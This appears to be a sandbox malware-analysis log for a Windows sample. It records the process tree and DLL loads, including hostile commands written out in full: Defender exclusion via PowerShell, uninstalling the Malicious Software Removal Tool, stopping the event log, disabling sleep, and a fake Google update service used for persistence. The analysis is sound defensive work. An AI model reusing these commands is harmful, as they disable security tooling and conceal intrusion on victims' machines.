                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess created: C:\Windows\SysWOW64\system64x.exe "C:\Windows\SysWOW64\system64x.exe"
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
                      Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess created: C:\Windows\SysWOW64\system64x.exe "C:\Windows\SysWOW64\system64x.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
